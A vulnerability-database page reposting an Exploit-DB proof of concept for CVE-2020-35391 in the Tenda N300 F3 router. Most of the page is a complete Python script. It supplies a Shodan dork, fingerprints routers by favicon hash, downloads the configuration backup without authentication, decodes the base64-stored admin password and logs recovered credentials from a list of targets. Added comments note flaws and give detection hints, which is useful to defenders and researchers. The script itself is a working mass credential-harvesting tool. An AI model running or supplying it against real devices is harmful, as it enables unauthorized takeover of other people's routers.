
Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing

🗓️ 07 Apr 2023 00:00:00 · Reported by @h454nsec · Type: exploitdb · 🔗 www.exploit-db.com · 👁 195 Views

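Tenda N300 F3 12.01.01.48 HTTP Request Header Processing (CVE-2020-35391). The proof-of-concept below requests the router's configuration backup (`/cgi-bin/DownloadCfg/RouterCfm.cfg`) without logging in and decodes the `http_passwd` value, which the file stores only base64-encoded. Keeping the router's web administration interface unreachable from untrusted networks limits exposure, and a password that may have been read this way should be changed.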

Related
0day.today
Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing Exploit
7 Apr 202300:00
zdt
GithubExploit
Exploit for Forced Browsing in Tenda F3_Firmware
9 Mar 202315:36
githubexploit
Circl
CVE-2020-35391
1 Jan 202112:32
circl
CNNVD
Tenda N300 Resource Management Error Vulnerability
1 Jan 202100:00
cnnvd
CVE
CVE-2020-35391
1 Jan 202100:00
cve
Cvelist
CVE-2020-35391
1 Jan 202100:00
cvelist
NVD
CVE-2020-35391
1 Jan 202107:15
nvd
Packet Storm
Tenda N300 F3 12.01.01.48 Header Processing
10 Apr 202300:00
packetstorm
Prion
Design/Logic Flaw
1 Jan 202107:15
prion
Positive Technologies
PT-2021-11759 · Tenda · Tenda N300 F3
1 Jan 202100:00
ptsecurity
#!/usr/bin/python3

# Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing 
# Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN"
# Date: 09/03/2023
# Exploit Author: @h454nsec
# Github: https://github.com/H454NSec/CVE-2020-35391
# Vendor Homepage: https://www.tendacn.com/default.html
# Product Link: https://www.tendacn.com/product/f3.html
# Version: All
# Tested on: F3v3.0 Firmware (confirmed)
# CVE : CVE-2020-35391

import re
import os
import sys
import argparse
import base64
import requests
import subprocess
# mmh3 (MurmurHash3 bindings) is a third-party package and is needed for the
# favicon fingerprint in is_tenda(); codecs is part of the standard library.
try:
    import mmh3
    import codecs
except ImportError:
    print("[!] Install mmh3: pip3 install mmh3")
    # sys.exit() with no argument exits with status 0 even though startup failed.
    sys.exit()

# ANSI SGR escape sequences used to colour the terminal output.
# Only Red, Green, Yellow, Purple, Cyan and Color_Off are referenced by main().
Color_Off="\033[0m"       # Reset to the terminal default
Black="\033[0;30m"        # Black
Red="\033[0;31m"          # Red
Green="\033[0;32m"        # Green
Yellow="\033[0;33m"       # Yellow
Blue="\033[0;34m"         # Blue
Purple="\033[0;35m"       # Purple
Cyan="\033[0;36m"         # Cyan
White="\033[0;37m"        # White

def ip_checker(ip):
    """Turn one target entry into the base URL string used by the rest of the script.

    Args:
        ip: A bare host/IP, a host followed by a path, or a string that already
            contains ``http://`` or ``https://``.

    Returns:
        ``http://<host>`` for entries without a scheme (any path is dropped).
        For entries with a scheme, the first and third ``/``-separated fields
        joined by ``://``.

    NOTE(review): for an entry that already carries a scheme, the first field
    keeps its trailing colon (``"http:"``), so the returned string contains
    ``":://"`` rather than ``"://"``.
    """
    if "/" not in ip:
        return f"http://{ip}"

    parts = ip.split("/")
    has_scheme = "http://" in ip or "https://" in ip
    if not has_scheme:
        # "host/path" form: keep only the host part.
        return f"http://{parts[0]}"
    return f"{parts[0]}://{parts[2]}"

def is_tenda(ip):
    """Report whether the favicon served at *ip* matches the known Tenda login icon.

    The body of ``{ip}/favicon.ico`` is base64-encoded with ``codecs`` and hashed
    with ``mmh3.hash``; the result is compared with -2145085239, the same value
    that appears in the ``http.favicon.hash`` search term in this file's header.
    The same fingerprint can be used to find these devices in an asset inventory.

    Args:
        ip: Base URL string as produced by ``ip_checker``.

    Returns:
        True on a hash match; False on a mismatch or on any exception
        (connection failure, invalid URL, ...).

    NOTE(review): ``requests.get`` is called without a ``timeout``, so an
    unresponsive host can block this call.
    """
    try:
        icon_bytes = requests.get(f'{ip}/favicon.ico').content
        fingerprint = mmh3.hash(codecs.encode(icon_bytes, "base64"))
        return fingerprint == -2145085239
    except Exception:
        # Every failure is treated as "not a match"; nothing is logged.
        return False

def password_decoder(data):
    """Extract and decode the ``http_passwd`` value from a configuration dump.

    The first line containing ``http_passwd=`` is selected, the text after the
    last ``=`` on that line is base64-decoded, and the bytes are decoded as
    UTF-8. Base64 is a reversible encoding, not protection: a config file that
    stores the password this way discloses it to anyone who can read the file.

    Args:
        data: Text of the configuration file, one ``key=value`` setting per line.

    Returns:
        The decoded password as ``str``, or ``False`` when no such line exists,
        the decoded value is empty, or decoding raises any exception.
    """
    try:
        candidates = [line for line in data.split("\n") if "http_passwd=" in line]
        # IndexError on an empty list is caught below and reported as False.
        encoded = candidates[0].rpartition("=")[2]
        decoded = base64.b64decode(encoded).decode("utf-8")
    except Exception:
        return False
    return decoded if decoded else False

def main(db):
    """Process every entry in *db* and record any password that is recovered.

    For each entry the function normalises it with ``ip_checker``, prints a
    green ``[+]`` or red ``[-]`` marker depending on ``is_tenda``, then requests
    ``/cgi-bin/DownloadCfg/RouterCfm.cfg`` with curl and passes the response to
    ``password_decoder``. When a password is returned, the raw response is saved
    under ``config_dump/`` and ``<url>|<password>`` is appended to
    ``credential.txt``.

    Args:
        db: Iterable of target strings (host, host/path or URL).

    Returns:
        None. Results are printed and written to files in the working directory.
    """
    for ip in db:
        ip_address = ip_checker(ip)
        tenda = is_tenda(ip_address)
        # print() returns None, so `header` is always None and is never read.
        # The fingerprint result only selects the marker; the request below is
        # sent whether or not the favicon matched.
        header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="")
        try:
            # curl is invoked so that no User-Agent (-A ''), Accept or Host header
            # is sent. For detection, a GET for this path that lacks those headers
            # is the request shape to look for in router or proxy logs.
            # NOTE(review): shell=True with ip_address interpolated into the command
            # string means a target-list line containing shell metacharacters is
            # interpreted by the local shell. Passing an argument list with
            # shell=False would avoid that.
            output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True)
            data = output.decode('utf-8')
            password = password_decoder(data)
            if password:
                if not os.path.isdir("config_dump"):
                    os.mkdir("config_dump")
                # File name is the last "/"-separated field of the URL (the host).
                # Both output files hold the recovered credential in cleartext and
                # are created with the process's default permissions.
                with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o:
                    o.write(data)
                with open(f"credential.txt", "a") as o:
                    o.write(f"{ip_address}|{password}\n")
                print(f"{Purple}:{Cyan}{password}{Color_Off}")
            else:
                # Nothing decoded: just end the marker line.
                print()
        except Exception as error:
            # All errors (curl failure, decode error, file I/O) are swallowed; only
            # the line is terminated, so a failure looks the same as "no password".
            print()

if __name__ == '__main__':
    # Command line: a single router via -i/--ip (default 192.168.0.1), or a file
    # with one entry per line via -l/--list_of_ip. The file takes precedence.
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)')
    parser.add_argument('-l', '--list_of_ip', help='List of IP address')
    args = parser.parse_args()

    if args.list_of_ip:
        with open(args.list_of_ip, "r") as list_file:
            # Surrounding whitespace is stripped; blank lines become empty entries.
            db = [entry.strip() for entry in list_file]
    else:
        db = [args.ip]
    main(db)
